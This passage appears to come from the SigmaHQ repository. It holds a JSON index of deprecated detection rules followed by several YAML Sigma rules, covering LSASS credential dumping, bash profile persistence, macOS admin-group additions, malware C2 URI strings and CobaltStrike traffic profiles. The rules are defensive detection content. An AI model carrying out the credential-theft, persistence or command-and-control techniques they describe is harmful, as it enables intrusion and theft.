{\n        \"id\": \"18739897-21b1-41da-8ee4-5b786915a676\",\n        \"title\": \"GALLIUM Artefacts\",\n        \"date\": \"2020-02-07\",\n        \"modified\": \"2023-03-09\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0eb2107b-a596-422e-b123-b389d5594ed7\",\n        \"title\": \"Hurricane Panda Activity\",\n        \"date\": \"2019-03-04\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4a12fa47-c735-4032-a214-6fab5b120670\",\n        \"title\": \"Lazarus Activity Apr21\",\n        \"date\": \"2021-04-20\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7454df60-1478-484b-810d-bff5d0ba6d4b\",\n        \"title\": \"DNS Tunnel Technique from MuddyWater\",\n        \"date\": \"2020-06-04\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"7b49c990-4a9a-4e65-ba95-47c9cc448f6e\",\n        \"title\": \"Lazarus Loaders\",\n        \"date\": \"2020-12-23\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"43f487f0-755f-4c2a-bce7-d6d2eec2fcf8\",\n        \"title\": \"Suspicious Add Scheduled Task From User AppData Temp\",\n        \"date\": \"2021-11-03\",\n        \"modified\": \"2023-03-14\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d813d662-785b-42ca-8b4a-f7457d78d5a9\",\n        \"title\": \"Suspicious Load of Advapi31.dll\",\n        \"date\": \"2022-02-03\",\n        \"modified\": \"2023-03-15\",\n        \"level\": \"informational\"\n    },\n    {\n        \"id\": \"e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\",\n        \"title\": \"Edit of .bash_profile and .bashrc\",\n        \"date\": \"2019-05-12\",\n        \"modified\": \"2023-03-23\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"ba2a7c80-027b-460f-92e2-57d113897dbc\",\n        \"title\": \"App Permissions Granted For Other APIs\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2023-03-29\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\",\n        \"title\": \"TA505 Dropper Load Pattern\",\n        \"date\": \"2020-12-08\",\n        \"modified\": \"2023-04-05\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"2d117e49-e626-4c7c-bd1f-c3c0147774c8\",\n        \"title\": \"Potential PowerShell Base64 Encoded Shellcode\",\n        \"date\": \"2018-11-17\",\n        \"modified\": \"2023-04-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"635dbb88-67b3-4b41-9ea5-a3af2dd88153\",\n        \"title\": \"Microsoft Binary Github Communication\",\n        \"date\": \"2017-08-24\",\n        \"modified\": \"2023-04-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6c939dfa-c710-4e12-a4dd-47e1f10e68e1\",\n        \"title\": \"Domestic Kitten FurBall Malware Pattern\",\n        \"date\": \"2021-02-08\",\n        \"modified\": \"2023-04-20\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6355a919-2e97-4285-a673-74645566340d\",\n        \"title\": \"Process Memory Dumped Via RdrLeakDiag.EXE\",\n        \"date\": \"2022-01-04\",\n        \"modified\": \"2023-04-24\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9cf01b6c-e723-4841-a868-6d7f8245ca6e\",\n        \"title\": \"Group Modification Logging\",\n        \"date\": \"2019-03-26\",\n        \"modified\": \"2023-04-26\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"410ad193-a728-4107-bc79-4419789fcbf8\",\n        \"title\": \"Trickbot Malware Reconnaissance Activity\",\n        \"date\": \"2019-12-28\",\n        \"modified\": \"2023-04-28\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fce5f582-cc00-41e1-941a-c6fabf0fdb8c\",\n        \"title\": \"Suspicious PowerShell Invocations - Specific\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2023-05-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"f016c716-754a-467f-a39e-63c06f773987\",\n        \"title\": \"Suspicious Remote Thread Target\",\n        \"date\": \"2022-08-25\",\n        \"modified\": \"2023-05-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"65d2be45-8600-4042-b4c0-577a1ff8a60e\",\n        \"title\": \"Application Whitelisting Bypass via DLL Loaded by odbcconf.exe\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2023-05-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"8e2b24c9-4add-46a0-b4bb-0057b4e6187d\",\n        \"title\": \"Regsvr32 Anomaly\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2023-05-26\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fe6e002f-f244-4278-9263-20e4b593827f\",\n        \"title\": \"Alternate PowerShell Hosts - Image\",\n        \"date\": \"2019-09-12\",\n        \"modified\": \"2023-06-01\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"9e77ed63-2ecf-4c7b-b09d-640834882028\",\n        \"title\": \"PsExec Pipes Artifacts\",\n        \"date\": \"2020-05-10\",\n        \"modified\": \"2023-08-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"39776c99-1c7b-4ba0-b5aa-641525eee1a4\",\n        \"title\": \"Execution via CL_Mutexverifiers.ps1\",\n        \"date\": \"2020-10-14\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4cd29327-685a-460e-9dac-c3ab96e549dc\",\n        \"title\": \"Execution via CL_Invocation.ps1 - Powershell\",\n        \"date\": \"2020-10-14\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4e8d5fd3-c959-441f-a941-f73d0cdcdca5\",\n        \"title\": \"Abusing Windows Telemetry For Persistence - Registry\",\n        \"date\": \"2020-09-29\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7c637634-c95d-4bbf-b26c-a82510874b34\",\n        \"title\": \"Disable Microsoft Office Security Features\",\n        \"date\": \"2021-06-08\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"8a58209c-7ae6-4027-afb0-307a78e4589a\",\n        \"title\": \"User Account Hidden By Registry\",\n        \"date\": \"2022-08-20\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9b894e57-033f-46cf-b7fa-a52804181973\",\n        \"title\": \"Office Security Settings Changed\",\n        \"date\": \"2020-05-22\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c81fe886-cac0-4913-a511-2822d72ff505\",\n        \"title\": \"SilentProcessExit Monitor Registration\",\n        \"date\": \"2021-02-26\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\",\n        \"title\": \"User Added To Admin Group - MacOS\",\n        \"date\": \"2023-03-19\",\n        \"modified\": \"2023-08-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5b80cf53-3a46-4adc-960b-05ec19348d74\",\n        \"title\": \"Wscript Execution from Non C Drive\",\n        \"date\": \"2022-10-01\",\n        \"modified\": \"2023-08-29\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5e3d3601-0662-4af0-b1d2-36a05e90c40a\",\n        \"title\": \"LSASS Memory Dump File Creation\",\n        \"date\": \"2019-10-22\",\n        \"modified\": \"2023-08-29\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"839f1ee1-292d-495a-bf37-818267b8ee82\",\n        \"title\": \"Vulnerable Driver Load By Name\",\n        \"date\": \"2022-10-03\",\n        \"modified\": \"2023-09-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"21b23707-60d6-41bb-96e3-0f0481b0fed9\",\n        \"title\": \"Vulnerable Dell BIOS Update Driver Load\",\n        \"date\": \"2021-05-05\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647\",\n        \"title\": \"Vulnerable GIGABYTE Driver Load\",\n        \"date\": \"2022-07-25\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7c676970-af4f-43c8-80af-ec9b49952852\",\n        \"title\": \"Vulnerable AVAST Anti Rootkit Driver Load\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9bacc538-d1b9-4d42-862e-469eafc05a41\",\n        \"title\": \"Vulnerable HW Driver Load\",\n        \"date\": \"2022-07-26\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"ac683a42-877b-4ff8-91ac-69e94b0f70b4\",\n        \"title\": \"Vulnerable Lenovo Driver Load\",\n        \"date\": \"2022-11-10\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6\",\n        \"title\": \"Usage Of Malicious POORTRY Signed Driver\",\n        \"date\": \"2022-12-16\",\n        \"modified\": \"2023-09-13\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d7825193-b70a-48a4-b992-8b5b3015cc11\",\n        \"title\": \"Windows Update Client LOLBIN\",\n        \"date\": \"2020-10-17\",\n        \"modified\": \"2023-11-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"ca83e9f3-657a-45d0-88d6-c1ac280caf53\",\n        \"title\": \"New Service Uses Double Ampersand in Path\",\n        \"date\": \"2022-07-05\",\n        \"modified\": \"2023-11-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fe34868f-6e0e-4882-81f6-c43aa8f15b62\",\n        \"title\": \"Windows Defender Threat Detection Disabled\",\n        \"date\": \"2020-07-28\",\n        \"modified\": \"2023-11-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"32d0d3e2-e58d-4d41-926b-18b520b2b32d\",\n        \"title\": \"Credential Dumping Tools Accessing LSASS Memory\",\n        \"date\": \"2017-02-16\",\n        \"modified\": \"2023-11-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a122ac13-daf8-4175-83a2-72c387be339d\",\n        \"title\": \"Security Event Log Cleared\",\n        \"date\": \"2021-08-15\",\n        \"modified\": \"2023-12-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"0332a266-b584-47b4-933d-a00b103e1b37\",\n        \"title\": \"Suspicious Get-WmiObject\",\n        \"date\": \"2022-01-12\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"46deb5e1-28c9-4905-b2df-51cdcc9e6073\",\n        \"title\": \"PowerShell Scripts Run by a Services\",\n        \"date\": \"2020-10-06\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d23f2ba5-9da0-4463-8908-8ee47f614bb9\",\n        \"title\": \"Powershell File and Directory Discovery\",\n        \"date\": \"2021-12-15\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2\",\n        \"title\": \"Credential Dumping Tools Service Execution\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"602a1f13-c640-4d73-b053-be9a2fa58b77\",\n        \"title\": \"Svchost DLL Search Order Hijack\",\n        \"date\": \"2019-10-28\",\n        \"modified\": \"2024-01-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"839dd1e8-eda8-4834-8145-01beeee33acd\",\n        \"title\": \"SAM Dump to AppData\",\n        \"date\": \"2018-01-27\",\n        \"modified\": \"2024-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e32ce4f5-46c6-4c47-ba69-5de3c9193cd7\",\n        \"title\": \"Possible Process Hollowing Image Loading\",\n        \"date\": \"2018-01-07\",\n        \"modified\": \"2024-01-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a6d67db4-6220-436d-8afc-f3842fe05d43\",\n        \"title\": \"Dnscat Execution\",\n        \"date\": \"2019-10-24\",\n        \"modified\": \"2024-01-25\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"d7b09985-95a3-44be-8450-b6eadf49833e\",\n        \"title\": \"Suspicious Non-Browser Network Communication With Reddit API\",\n        \"date\": \"2023-02-16\",\n        \"modified\": \"2024-02-02\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"37325383-740a-403d-b1a2-b2b4ab7992e7\",\n        \"title\": \"CobaltStrike Malleable (OCSP) Profile\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"41b42a36-f62c-4c34-bd40-8cb804a34ad8\",\n        \"title\": \"CobaltStrike Malformed UAs in Malleable Profiles\",\n        \"date\": \"2021-05-06\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"953b895e-5cc9-454b-b183-7f3db555452e\",\n        \"title\": \"CobaltStrike Malleable Amazon Browsing Traffic Profile\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\",\n        \"title\": \"CobaltStrike Malleable OneDrive Browsing Traffic Profile\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"73fcad2e-ff14-4c38-b11d-4172c8ac86c7\",\n        \"title\": \"Suspicious Rundll32 Script in CommandLine\",\n        \"date\": \"2021-12-04\",\n        \"modified\": \"2024-02-23\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"9f06447a-a33a-4cbe-a94f-a3f43184a7a3\",\n        \"title\": \"Rundll32 JS RunHTMLApplication Pattern\",\n        \"date\": \"2022-01-14\",\n        \"modified\": \"2024-02-23\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e06ac91d-b9e6-443d-8e5b-af749e7aa6b6\",\n        \"title\": \"iOS Implant URL Pattern\",\n        \"date\": \"2019-08-30\",\n        \"modified\": \"2024-02-26\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"628d7a0b-7b84-4466-8552-e6138bc03b43\",\n        \"title\": \"Suspicious Epmap Connection\",\n        \"date\": \"2022-07-14\",\n        \"modified\": \"2024-03-01\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9433ff9c-5d3f-4269-99f8-95fc826ea489\",\n        \"title\": \"CrackMapExec File Creation Patterns\",\n        \"date\": \"2022-03-12\",\n        \"modified\": \"2024-03-01\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c625c4c2-515d-407f-8bb6-456f65955669\",\n        \"title\": \"Service Binary in Uncommon Folder\",\n        \"date\": \"2022-05-02\",\n        \"modified\": \"2024-03-25\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"42f0e038-767e-4b85-9d96-2c6335bad0b5\",\n        \"title\": \"Adwind RAT / JRAT - Registry\",\n        \"date\": \"2017-11-10\",\n        \"modified\": \"2024-03-26\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"5039f3d2-406a-4c1a-9350-7a5a85dc84c2\",\n        \"title\": \"Search-ms and WebDAV Suspicious Indicators in URL\",\n        \"date\": \"2023-08-21\",\n        \"modified\": \"2024-05-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"b916cba1-b38a-42da-9223-17114d846fd6\",\n        \"title\": \"Potential NT API Stub Patching\",\n        \"date\": \"2023-01-07\",\n        \"modified\": \"2024-05-27\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3d968d17-ffa4-4bc0-bfdc-f139de76ce77\",\n        \"title\": \"Potential Persistence Via COM Hijacking From Suspicious Locations\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2024-07-16\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"1a3d42dd-3763-46b9-8025-b5f17f340dfb\",\n        \"title\": \"Suspicious Unattend.xml File Access\",\n        \"date\": \"2021-12-19\",\n        \"modified\": \"2024-07-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"6902955a-01b7-432c-b32a-6f5f81d8f624\",\n        \"title\": \"Suspicious File Event With Teams Objects\",\n        \"date\": \"2022-09-16\",\n        \"modified\": \"2024-07-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\",\n        \"title\": \"Potential Persistence Via COM Search Order Hijacking\",\n        \"date\": \"2020-04-14\",\n        \"modified\": \"2024-09-02\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a33f8808-2812-4373-ae95-8cfb82134978\",\n        \"title\": \"Windows Defender Exclusion Deleted\",\n        \"date\": \"2019-10-26\",\n        \"modified\": \"2025-01-30\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"e17121b4-ef2a-4418-8a59-12fb1631fa9e\",\n        \"title\": \"Delete Volume Shadow Copies via WMI with PowerShell - PS Script\",\n        \"date\": \"2021-12-26\",\n        \"modified\": \"2025-05-20\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6e897651-f157-4d8f-aaeb-df8151488385\",\n        \"title\": \"PowerShell Web Download\",\n        \"date\": \"2022-03-24\",\n        \"modified\": \"2025-07-18\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"f748c45a-f8d3-4e6f-b617-fe176f695b8f\",\n        \"title\": \".RDP File Created by Outlook Process\",\n        \"date\": \"2024-11-01\",\n        \"modified\": \"2025-07-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a2a3b925-7bb0-433b-b508-db9003263cc4\",\n        \"title\": \"Active Directory Parsing DLL Loaded Via Office Application\",\n        \"date\": \"2020-02-19\",\n        \"modified\": \"2025-10-17\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"cdeef967-f9a1-4375-90ee-6978c5f23974\",\n        \"title\": \"Azure Application Credential Modified\",\n        \"date\": \"2021-09-02\",\n        \"modified\": \"2025-10-17\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"8f70ac5f-1f6f-4f8e-b454-db19561216c5\",\n        \"title\": \"PowerShell DownloadFile\",\n        \"date\": \"2020-08-28\",\n        \"modified\": \"2025-10-20\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e28a5a99-da44-436d-b7a0-2afc20a5f413\",\n        \"title\": \"Whoami Utility Execution\",\n        \"date\": \"2018-08-13\",\n        \"modified\": \"2025-10-20\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"7417e29e-c2e7-4cf6-a2e8-767228c64837\",\n        \"title\": \"Active Directory Kerberos DLL Loaded Via Office Application\",\n        \"date\": \"2020-02-19\",\n        \"modified\": \"2025-10-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"879c3015-c88b-4782-93d7-07adf92dbcb7\",\n        \"title\": \"Space After Filename\",\n        \"date\": \"2020-06-17\",\n        \"modified\": \"2025-11-22\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"e710a880-1f18-4417-b6a0-b5afdf7e305a\",\n        \"title\": \"Atomic MacOS Stealer - FileGrabber Infostealer Execution\",\n        \"date\": \"2025-09-12\",\n        \"modified\": \"2025-11-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4be03877-d5b6-4520-85c9-a5911c0a656c\",\n        \"title\": \"FileFix - Suspicious Child Process from Browser File Upload Abuse\",\n        \"date\": \"2025-06-26\",\n        \"modified\": \"2025-11-24\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6e30c82f-a9f8-4aab-b79c-7c12bce6f248\",\n        \"title\": \"File Download Via Bitsadmin To An Uncommon Target Folder\",\n        \"date\": \"2022-06-28\",\n        \"modified\": \"2025-12-10\",\n        \"level\": \"medium\"\n    }\n]"
  },
  {
    "path": "deprecated/linux/lnx_auditd_alter_bash_profile.yml",
    "content": "title: Edit of .bash_profile and .bashrc\nid: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\nstatus: deprecated\ndescription: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.\nreferences:\n    - 'MITRE Attack technique T1156; .bash_profile and .bashrc. '\nauthor: Peter Matkovski\ndate: 2019/05/12\nmodified: 2023/03/23\ntags:\n    - attack.s0003\n    - attack.persistence\n    - attack.t1546.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/root/.bashrc'\n            - '/root/.bash_profile'\n            - '/root/.profile'\n            - '/home/*/.bashrc'\n            - '/home/*/.bash_profile'\n            - '/home/*/.profile'\n            - '/etc/profile'\n            - '/etc/shells'\n            - '/etc/bashrc'\n            - '/etc/csh.cshrc'\n            - '/etc/csh.login'\n    condition: selection\nfalsepositives:\n    - Admin or User activity\nlevel: medium\n"
  },
  {
    "path": "deprecated/linux/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd\nid: 045b5f9c-49f7-4419-a236-9854fb3c827a\nstatus: unsupported # This rule requires correlations. See https://github.com/SigmaHQ/sigma/discussions/4440#discussioncomment-7070862 and https://user-images.githubusercontent.com/9653181/133756156-4fb9c2b1-aa65-4380-957b-72170de36fc4.png\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\n    SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\n    Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-09-17\nmodified: 2024-09-02\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        syscall: 'execve'\n        uid: 0\n        cwd: '/var/opt/microsoft/scx/tmp'\n        comm: 'sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.\nlevel: high\n"
  },
  {
    "path": "deprecated/linux/lnx_space_after_filename_.yml",
    "content": "title: Space After Filename\nid: 879c3015-c88b-4782-93d7-07adf92dbcb7\nstatus: deprecated\ndescription: Detects space after filename\nauthor: Ömer Günal\ndate: 2020-06-17\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: linux\ndetection:\n    selection1:\n        - 'echo \"*\" > * && chmod +x *'\n    selection2:\n        - 'mv * \"* \"'\n    condition: all of selection*\nfalsepositives:\n    - Typos\nlevel: low\n"
  },
  {
    "path": "deprecated/macos/proc_creation_macos_add_to_admin_group.yml",
    "content": "title: User Added To Admin Group - MacOS\nid: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\nstatus: deprecated\ndescription: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\n    - https://ss64.com/osx/dscl.html\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023/03/19\nmodified: 2023/08/22\ntags:\n    - attack.t1078.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_sysadminctl: #creates and adds new user to admin group\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            - ' -addUser '\n            - ' -admin '\n    selection_dscl: #adds to admin group\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - ' -append '\n            - ' /Groups/admin '\n            - ' GroupMembership '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "deprecated/macos/proc_creation_macos_malware_amos_filegrabber_exec.yml",
    "content": "title: Atomic MacOS Stealer - FileGrabber Infostealer Execution\nid: e710a880-1f18-4417-b6a0-b5afdf7e305a\nstatus: deprecated\ndescription: |\n    Detects the execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\nauthor: Jason Phang Vern - Onn (Gen Digital)\ndate: 2025-09-12\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'FileGrabber'\n            - '/tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/other/generic_brute_force.yml",
    "content": "title: Brute Force\nid: 53c7cca0-2901-493a-95db-d00d6fcf0a37\nstatus: deprecated\ndescription: Detects many authentication failures from one source to one destination which is may indicate Brute Force activity\nauthor: Aleksandr Akhremchik, oscd.community\ndate: 2019/10/25\nmodified: 2022/11/04\nlogsource:\n  category: authentication\ndetection:\n  selection:\n    action: failure\n  timeframe: 600s\n  condition: selection | count(category) by dst_ip > 30\nfields:\n  - src_ip\n  - dst_ip\n  - user\nfalsepositives:\n  - Inventarization\n  - Vulnerability scanner\n  - Legitimate application\nlevel: medium\ntags:\n  - attack.credential_access\n  - attack.t1110\n"
  },
  {
    "path": "deprecated/web/proxy_apt_domestic_kitten.yml",
    "content": "title: Domestic Kitten FurBall Malware Pattern\nid: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1\nstatus: deprecated\ndescription: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group\nreferences:\n    - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/02/08\nmodified: 2023/04/20\ntags:\n    - attack.command_and_control\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains:\n            - 'Get~~~AllBrowser'\n            - 'Get~~~HardwareInfo'\n            - 'Take~~RecordCall'\n            - 'Reset~~~AllCommand'\n    condition: selection\nfields:\n    - c-ip\n    - c-uri\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_amazon.yml",
    "content": "title: CobaltStrike Malleable Amazon Browsing Traffic Profile\nid: 953b895e-5cc9-454b-b183-7f3db555452e\nstatus: deprecated\ndescription: Detects Malleable Amazon Profile\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\n    - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection_1:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'GET'\n        c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'\n        cs-host: 'www.amazon.com'\n        cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'\n    selection_2:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'POST'\n        c-uri: '/N4215/adj/amzn.us.sr.aps'\n        cs-host: 'www.amazon.com'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_malformed_uas.yml",
